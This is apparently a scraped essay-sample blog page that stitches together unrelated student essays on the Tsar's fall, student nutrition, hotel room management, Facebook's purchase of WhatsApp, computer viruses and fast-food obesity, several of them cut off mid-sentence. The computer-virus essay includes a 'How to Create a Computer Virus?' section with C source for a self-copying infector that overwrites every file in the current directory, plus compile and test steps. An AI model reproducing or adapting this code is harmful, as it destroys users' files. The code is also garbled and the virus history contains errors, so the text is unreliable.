Sunday, March 22, 2020

How far was theTsar Nicholas the second responsible free essay sample

The ever declining popularity of world war one, the failure for the Tsar to make reforms after the 1905 revolution, along with ever growing forces of revolutionary parties all contributed to the fall of the Tsar Nicholas the II. But was he to blame? In this essay one will discuss the factors instigating the fall of the Tsar, and how far he was responsible for his own demise. The living conditions for the peasant population across Russia were atrocious. This presented itself as a major problem for the Tsar, as over 80% of the population was comprised of peasants, and this lead to them emanding reform. Over 25% of the wealth of Russia was owned by Just 1% of the population, this alarming statistic created a colossal division between rich and poor, further stressing the peasants point of reformation. By 1904 life expectancy in Russia was 40, despite serfdom being abolished, peasants had to pay redemption reparations to cover landowners workforce losses, these repayments lasted for 49 years, longer than a peasants lifetime, sometimes even two. We will write a custom essay sample on How far was theTsar Nicholas the second responsible or any similar topic specifically for you Do Not WasteYour Time HIRE WRITER Only 13.90 / page These problems all lead to the widespread strikes and protest that spread across Russia between 1905 and 917. The widespread unrests across Russia lead to the horrific event of bloody Sunday where over 1000 peaceful protestors were killed, ruining Nicholas image as the little father. This event was the spark of the 1905 revolution, and through this, events such as the Potemkin Mutiny occurred. As a result of this widespread uproar, the October manifesto was produced. This could have potentially resolved the problems, especially considering the duma, however the Tsar made bad decisions and still had complete autocratic power, a power that the duma could not control. In reality the October manifesto did not solve anything, it merely postponed the inevitability of the Tsars downfall and increased his ever proliferating opposition. In 1914 Russia Joined the war under the rule of Nicholas, initial response to the war was popular, and for a brief time the Tsars popularity soared, this was down to the new found hope of victory, reinforced by nationalism. However in reality it was a different story; early defeats lead to over one million deaths by the end of 1914, and this crushed any morale for the war. As the war continued, Russia persisted to fght a losing battle, the death toll mounted and Russian lands were being lost rapidly. This soon made the war unpopular and as a result increased opposition to the Tsar. By 1916 the transport system had completely shut down, and the war had drained Russia into economic collapse. This lead to widespread famine across what was left of the Russian empire, and millions starved. The economic system had failed, leading to a loss in the value of the rouble, resulting in a distrust of government. This distrust had been growing, especially because the Tsarina was German, she was considered a spy. Notably one of the Tsars greatest mistakes, and arguably the final straw was when he elected himself GI-C of the army. He had next to nothing in terms of military experience, and left the German Tsarina in charge of the government. By 1917 the people of Russia demanded peace and an end to the war. This combination destroyed the Tsars reputation completely, and lead to the rise in support for revolutionary parties. During the time ot the 1917 revolution, there were three main parties, the Mensheviks, Bolsheviks and the Social revolutionaries. All three parties drove towards revolution, and forced the Tsar to abdicate. The Tsar had no other choice but to abdicate, unlike in 1905, the revolution was more organised and the Tsar had lost the support of his army, he could do nothing but flee or die, he chose the latter, only to postpone his inevitable fate. It was in 1917 that Alexander Kerensky, the leader of the social revolutionary party; took power after the Tsars abdication by nstigating the provisional government after the march/February revolution. In conclusion; the Tsar was almost entirely responsible for his own destruction. Despite many chances of amending his mistakes, such as that of the October Manifesto, he persisted to repress his people, leading to his imminent destruction as the leader of Russia. However in defence of the Tsar; he was ill equipped for the task as leader of Russia, especially after inheriting the throne unexpectedly from his father. He had received no training, no preparation, and had no military experience nd was effectively stabbing in the dark with his political decisions. This was notably no fault of his own, but more the fault of the tradition of Russian autocracy. The poor decisions are blindingly obvious to an individual who would have been trained; such as taking charge as C-I-C and ignoring the threat of revolution, and even being presented with the chance to amend his wrong doings, he turned away. These decisions ultimately cost him his life, and had he been adequately equipped for the job of Tsar, he would not have made these poor decisions.

Thursday, March 5, 2020

Nutritional Habits of College- Age Students essays

Nutritional Habits of College- Age Students essays In many studies it has been stated that college age students are more likely to pick up a few pounds during their stint in school. The research conducted in this study will be used to determine the nutritional awareness of college students. In this study females will be compared to males to determine if there is a difference in the their levels of nutritional awareness. Initially the researcher thought that female group would have higher nutritional awareness than that of the male group. Although females scored higher on some of the questions asked, the researcher found that there was no particular difference between the two groups in regards to Weight gain is so common during the first year of college that there's a name for it: "The Freshman 15". It pops up a lot in campus conversation, and new students swear it won't happen to them. Yet, when summer vacation rolls around next year, many will be buying their jeans a size or two larger. This researcher thinks living on campus (leads to) higher weight gain rates, because you don't have your mom cooking dinner and healthy meals for you. Campus dining is a problem - there aren't many healthy options. Attending college for the first time represents a huge lifestyle shift that can result in the sort of 'sneaking' weight gain Oftentimes, they don't recognize the changes that are going to occur. There are two things that often add to the problem: Their activity level drops - if they were in a sport and don't continue that sport in college, they're going to see weight gain if their food intake stays the same. Furthermore, they're taking in the social scene, increasing food and beverage intake and to make matters worse, hectic schedules and late-night studying can mean losing track of body rhythms, eating according to convenience instead of appetite. Students will eat whatever is fast and available. At Alabama Agricultural and Mechanic...

Tuesday, February 18, 2020

Room Division Operation Management Essay Example | Topics and Well Written Essays - 1750 words

Room Division Operation Management - Essay Example Other organisations such as learning institutions provide accommodation plus reception services (Pizam 2010, p. 103). For instance, higher education institutions such as colleges and universities provide accommodation inform of hostels (Andrews 2008, p. 38). Accommodation services in such organisations comprise of administration, booking, as well as communication services, while the reception services comprise of enquiries, cashiers plus room allocation services (Pizam 2010, p. 103). Accommodation and front office services are split into diverse departments and have a number of functions (Pizam 2010, p. 103). They include a front office manager whose works is to provide high quality services through providing more than the demands of the clients (Andrews 2008, p. 39). This manager plans, organises, controls, as well as directs all the functioning expenses plus the issue connected to the revenues (Pizam 2010, p. 103). The work of the guest service personnel is to welcome guests/customers who arrive at the hotel, show them the reception for clearing purposes, assign the guests their rooms plus assisting the customers carry their belongings to their rooms (Pizam 2010, p. 103). They also book and organise for guests’ arrival. Finally, night auditors work at the front office and they complement the work of the front office manager, as well as the guest service personnel. They also posts charges for numerous services offered to the guest (Andrews 2008, p. 39). A number of legal and statutory requirements help prevent business oppression and preserve competition by regulating the business functions (Pizam 2010, p. 104). The law urges that hotel operators should agree on the scope concerning operations and terms of rates, room provision and business conditions along with uniforms. In addition, the room allocation law counts or holds the innkeepers accountable for the customers’ property (Andrews 2008, p. 39). Nevertheless, this

Monday, February 3, 2020

Discussing why Facebook recently acquired Whatsapp Essay

Discussing why Facebook recently acquired Whatsapp - Essay Example Facebook and whatsapp are among the leading social media platforms we have in the modern world. The two social Medias have significant number of users that each pose a threat to another as far as the social media business is concerned. In comparison to other social Medias that have been in existence before the invention of whatsapp, facebook was dominating the market with the highest number of users. With the coming of whatsapp in the social media market, it intensified the completion to a point where facebook opted to acquire it. Apart from the excessive competition in the social media market brought about by Whatsapp application, there are many other ways to justify the acquisition of Whatsapp by Facebook. Just like in other forms of business, one business my either merge with another or fully acquire it depending on the business environment they both face. According to studies by Ireland, Hoskisson and Hitt (2012 pp.133), one business may acquire another in order to increase its growth, gain market power, manage risks and reduce costs. In relation to such acquisition reasons, Facebook owners made the move to acquire Whatsapp in order to increase its growth in the social media market. Acquiring Whatsapp, which is a strong competitor, would also help Facebook manage the risk of elimination from business and cut costs of operation such as advertising. Management of such factors would subsequently lead to an increase in the market power by Facebook. In studies conducted by Frankel (2011 pp.22), he notes that, among the main reasons why one business may acquire another include customers and market share. One business may want to take over the customers of a competing business and successively take over the market share. In relation to the above studies, Facebook will take over the users of whatsapp and subsequently its market share. This is possible because Whatsapp has the ability to attract many users than facebook. Studies

Sunday, January 26, 2020

Background Of Studies On Computer Viruses

Background Of Studies On Computer Viruses A computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves. Section 1.2 Background of Studies on Various Computer Viruses Boot Sector Viruses This type of viruses has ability to hide in boot sector. The viruses will load into memory when there is booting system and trying to read from hard disk. Boot sector viruses are more spread since old time when floppy disk was popular. But now we hardly seen them since many of them only can spread through floppy disk. This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk. The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive. Examples of boot viruses include: Polyboot.B, AntiEXE. Companion Viruses Companion Viruses is another kind of viruses. When user computer infect by this sort of viruses, it will create another type file from an existing file in same directory (such as creating file.com from file.exe in the same folder), some companion viruses create file.exe from any folder. It can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they accompany the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses). Some examples include: Stator, Asimov.1539, and Terrax.1069 Encrypted Viruses This type of viruses consists of encrypted malicious code, decrypted module. The viruses use encrypted code technique which make antivirus software hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves. Logic Bomb Viruses Logic Bomb Viruses or sometime know as Time Bomb is small piece of malicious code or program which have ability to insert itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on. They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs. Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive. Macro Viruses When talking about Macro Viruses, we refer to viruses which infect macro of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting undesired texts or symbols. Example of Macro Virus: WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook. Multipartite Viruses Multipartite Viruses is type of viruses which infect user computer on both part boot sector and executable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone. It changes the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus. Once infected it becomes impossible to locate the original files Example: Ghost ball, the first multipartite virus. Nonresident Viruses This type of viruses is similar to Resident Viruses by using replication of module. Besides that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is executed). Polymorphic Viruses: Polymorphic Virus is similar to encrypted viruses; it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not remain any identical after replication. Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system. This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves. Examples include: Elkern, Marburg, Satan Bug, and Tuareg. Resident Viruses Resident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory (RAM). The viruses are commonly classified into two main categories: Fast Infectors and Slow Infectors. This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc. Examples include: Randex, CMJ, Meve, and MrKlunky. Stealth Viruses / Worm Stealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them. A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antivirus. Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson. Section 1.3.1 Research Question 1. How did the diff. types of computer Viruses Created when, where, by whom? 2. How are they attack/work on the end user computers? 3. How we protect ourself from such type of computer viruses? 4. What will be the future trend of computer viruses? Section 1.3.2 Research Aim The research aims at understanding how Computer viruses is evolving and attacking on day to day computer business Section 1.3.3 Research Objective The objective of this research is to help to the User of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the creator of computer viruses and the end user of the computer. Section 1.3.4 Research Hypothesis Many of the viruses that have had the greatest impact have been intended to be totally benign. Unfortunately, small errors in program code have led to disastrous results. The most frequent such error is when a virus program, which was intended to infect a computer only once, doesnt realize it has already done its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small drain of a single virus can pass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded. The hidden message revealed by the widely publicized cases of infection by computer viruses is that existing computer systems of all sorts could be making very large errors that have never been recognized. This means the computer systems that take care of every aspect of the worlds financial life, computer systems that keep personal records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a major system is likely only to have been thoroughly tested for frequently occurring events. Its the infrequently occurring events, and especially the unforeseen combinations of events, that are the bane of systems developers. And those are also the areas where Poincares admonition is most likely to come into play. Chapter 2 Literature Review What is Computer virus? Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves History of Computer viruses The first academic work on the theory of computer viruses (although the term computer virus was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the Theory and Organization of Complicated Automata. The work of von Neumann was later published as the Theory of self-reproducing automata In his essay von Neumann postulated that a computer program could reproduce. In 1972 Veith Risak published his article Selbstreproduzierende Automaton mitt minimaler Informationsà ¼bertragung (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system. In 1984 Fred Cohen from the University of Southern California wrote his paper Computer Viruses Theory and Experiments It was the first paper to explicitly call a self-reproducing program a virus; a term introduced by his mentor Leonard Adelman. An article that describes useful virus functionalities was published by J. B. Gunn under the title Use of virus functions to provide a virtual APL interpreter under user control in 1984. Science Fiction The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers. The actual term virus was first used in David Gerrolds 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off. Virus programs History The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, Im the creeper, catch me if you can! was displayed. The Reaper program was created to delete Creeper. A program called Elk Cloner was the first computer virus to appear in the wild that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning Elk Cloner: The program with a personality. The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to deter piracy of the software they had written. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface. Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a mating of the two and would likely be detected as a virus unique from the parents. A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo. Time line of computer viruses: In the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection. YEAR VIRUS NAME BY WHOM TYPE 1982 ELK CLONER RICH SKRENTA 1983 COMPUTER VIRUS FRED COHEN 1986 BRAIN PAKISTAN BOOT SECTOR 1988 ARPANET ROBBERT MORRIS ENCRYPTED 1989 AIDS TROJAN 1990 ANTI-VIRUS S/W 1991 NON-ANTI S/W SYMANTEC POLYMORPHIC 1994 HOAX 1995 WORD 1999 MELLISA DAVID L. SMITH 2000 I LOVE U FILIPINE STUDENT 2001 CODE RED WORM 2003 SLAMMER 2004 MY DOON/NOVARG 2005 COMMWARRIOR-A RUSSIA CELL PHONE 2008 CONFICKER 2009 CYNER ATTACK W32.DOZOR 2010 STUNEXT TROJAN 2011 HTTP BOT BLACK SHADES Programming language used for creating Computer Viruses: C C++ Assembler PHP JAVA SCRIPT VB SCRIPT MICRO LANGUAGE/CODE How Computer Viruses Work As youll see in the next section, the term virus was applied to this type of software very early in its history. Its an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies. A biological virus isnt truly a living, independent entity; as biologists will tell you, a virus is nothing more than a fragment of DNA sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cells normal mechanisms to reproduce itself. A computer virus is like a biological virus in that it also isnt an independent entity; it must Piggyback on a host (another program or document) in order to propagate. How a virus infects your computer 1. Virus program is launched. 2. Virus code is loaded into PC memory. 3. Virus delivers its destructive payload. 4. Virus copies itself to other programs. How Computer Viruses Work 5 If all a virus did was copy itself to additional programs and computers, there would be little Harm done, save for having all our programs get slightly larger (thanks to the virus code). Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus might, for example, delete certain files on your computer. It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs. Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, shutting down servers and forcing ten s of thousands of users offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly. As you might suspect, most viruses are designed to deliver their payload when theyre first executed. However, some viruses wont attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeper Agent in a spy novel, until theyre awoken on a specific date; then they go about the work them were programmed to do. In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination. How to Create a Computer Virus? This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Heres the source code of the virus program. #include #include #include #include #include #include FILE *virus,*host; int done, a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(*.*,ffblk,0); while(!done) { virus=fopen(_argv[0],r3. Virus delivers its destructive payload. b); host=fopen(ffblk.ff_name,rb+); if(host==NULL) goto next; x=89088; printf(Infecting %sn,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(ffblk); } } printf(DONE! (Total Files Infected= %d),a); end=clock(); printf(TIME TAKEN=%f SECn, (end-st)/CLK_TCK); getch(); } COMPILING METHOD: USING BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 STEP 2.Now the generated EXE File is ready to infect USING BORLAND C++ 5.5 (32-BIT) : 1. Compile once, note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it. The new EXE file is ready to infect HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4. All the infected files will be ready to re-infect. Why Viruses Exist Computer viruses, unlike biological viruses, dont spring up out of now here-theyre created. By people. And the people-programmers and developers, typically-who create computer viruses Know what theyre doing. These code writers deliberately create programs that they know will Wreak havoc on huge numbers of computer users. The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, Visual Basic, or Java, or a macro language, such as VBA. By using a build your own virus program-of which there are several available, Via the Internet underground. So, by definition, a virus writer is a person with a certain amount of technical expertise. But Instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users. This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of causing as much damage as possible, from the relative Anonymity of their computer keyboards. Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a successful virus provides a kind of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled. Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to deliberately perpetrate such destruction on such a wide scale. In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our high-tech age, such Pleasure can come from writing destructive virus code. What You Can Do About Computer Viruses Theres very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesnt always mean there are fewer criminals; the truth is, theres a new batch of virus writers coming online every day. All of which means that you cant rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself. Reducing Your Chances of Infection To make yourself less of a target for virus infection, take the following steps: Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put you at risk like this unless you absolutely have to. Dont open any e-mail attachments you werent expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. Theyre a good first line of defence, As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates. Enable macro virus protection in all your applications. Most current Microsoft Applications include special features that keep the program from running unknown macros and thus prevent your system from being infected by macro viruses. Create backup copies of all your important data. If worse comes to worst and your Entire system is infected; you may need to revert to no infected versions of your most critical Files. You cant do this unless you plan ahead and back up your important data. Preventing Viruses Attacks. Diagnosing a Virus Infection How do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didnt do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for: à ¢Ã¢â€š ¬Ã‚ ¢ Programs quit working or freeze up. à ¢Ã¢â€š ¬Ã‚ ¢ Documents become inaccessible. à ¢Ã¢â€š ¬Ã‚ ¢ Computer freezes up or wont start properly. à ¢Ã¢â€š ¬Ã‚ ¢ The CAPS LOCK key quits working-or works intermittently. à ¢Ã¢â€š ¬Ã‚ ¢ Files increase in size. à ¢Ã¢â€š ¬Ã‚ ¢ Frequent error messages appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Strange messages or pictures appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Your PC emits strange sounds. à ¢Ã¢â€š ¬Ã‚ ¢ Friends and colleagues inform you that theyve received strange e-mails from you, that you dont remember sending. How to Catch a Virus. Recovering from a Virus Attack If youre unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system. You dont, however, have to give up and throw your computer away. Almost all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools. The right tools include one of the major antivirus programs discussed in Anti-Virus Software and Services. These programs-such as Norton Antivirus

Saturday, January 18, 2020

McDonald’s Chain Essay

One of the largest fast-food chains in the world, McDonald’s, is an Olympic sponsor. This has caused much controversy in the UK, where health problems caused by obesity are on the increase. Discuss. Nowadays, with rapidly global economic development, a wealth of food corporations are expanding their businesses. An increasing number of fast-food chains have had a marked effect on the way we live. Fast-food is very popular in modern life, because it caters for our fast-paced lives. However, many studies claim that fast-food is associated with obesity (The Health of The Nation,1992,P21 ). This essay will analyse the advantages and disadvantages of fast-food and in the following essay I will discuss the relationship between obesity and fast-food. In the first place, we should define the term obesity. Obesity is described by the World Health Organization(WHO) as â€Å"a disease in which excess body fat has accumulated to such an extent that health may be adversely affected.† (Ewles.L,2005, P80) Throughout the world, obesity has been increasing at an unprecedented rate. This is true not only for industrialized societies, but also for developing countries. (Barnett.A.H and Kumar.S ,2008,P3) â€Å"In 1995, there were an estimated 200 million obese adults worldwide and another 18 million under-five children classified as overweight . As of 2000, the number of obese adults has sharply increased to over 300 million. In developing countries, it is estimated over 115 million people suffer from obesity-related problems.† Indeed, the rate of obesity has been exploded in last 20 years. (Ewles.L,2005, P80) Today, it is accepted that obesity is one of the biggest threats to public health. Fast food such as hamburgers and hot dogs are often high in sugar, salt, cholesterol and trans fats. The intake of these elements can lead to marked obesity. The support from the national study, compared to the days before fast food, energy consumption was over 187 kcal per meal when an adult consumption of fast food . (Larsson.B, 1981 ,P97).Based on national study, more and more people are realizing there is a connection between fast food and obesity. There are studies which confirm this idea. Obesity is a major contributor to the risk of heart disease and type 2 diabetes. In the Nurse’s Health Study, (Larsson.B,1981 P97-P116) the risk of developing diabetes increased five-fold in obese women with BMI 25kg/m2 compared with others women who have standard of body weight . In the same study, â€Å"the risk of developing CHD increased 3.3-fold with BMI>29kg /m and 1.8 fold between 25 and 29kg/m2 compared to those women with BMI>21kg/m2 .† The result shows that each kilogram of weight gained from 18 years old was associated with 3.1 times higher risk of heart disease risks. From those figures. It appears that obesity is one of the significant factors of heart disease and type 2 diabetes. There is also an important association between obesity and hypertension. In the Swedish Obesity Study, (Barnett.A.H and Kumar.S ,2008,P154) hypertension was present at base line in approximately one-half of subjects. â€Å"The study involving 1000 men and women showed that a 10kg increase in weight was related to 3mmHg rise in systolic and 2.3 mmHg rise in diastolic blood pressure.† However, this extent also can increase 12% risk of hypertension by high blood pressure. From this study, we can see clearly the relationship between the weight and data of blood pressure. When the weight is above normal, the weight gain and the risk of hypertension is in proportion. So, weight loss can help obese people reduce the risk of high blood pressure. Fast food is a main factor in childhood obesity. According to a national study, (Barnett.A.H and Kumar.S ,2008,P107) there is a positive correlation between childhood obesity and the consumption of fast food. For example in the late 1970s, fast food accounted for 2 per cent of total energy intake in children in the USA. Since the 1990s, the proportion of fast food consumption has increased five-fold. At the same time the percentage of overweight American children increased from 5% to 15%. In fact , fast food outlets have been growing sharply since the 1990s .The negative effects of fast food consumption on children is increasing. Fast food have a lot of unhealthy ingredients, including carbohydrates, fats and non-starchy vegetables, (Barnett.A.H and Kumar.S ,2008,P226) those elements has been linked to weight gain. In addition, approximately 20% – 30% of obese children appear to be at risk of the same complications of obesity as obese adults. (Barnett.A.H and Kumar.S ,2008,P227) Childhood obesity is becoming a public health crisis. However, there are some advantages in fast food. First of all , the most obvious advantage is quite convenient. in contemporary society as people have no time to prepare their food. Work occupies most of our time, we need to squeeze more time for work. So fast food becomes an ideal choice for modern people. The reasons are not only fast food can eliminate the time spent on cooking, but it also tastes delicious, some of young people particularly are addicted to the flavour of fast food. Moreover, the lower price of fast food attractes people. A further advantage is that fast food outlets usually have a clean and comfortable environments . In conclusion, 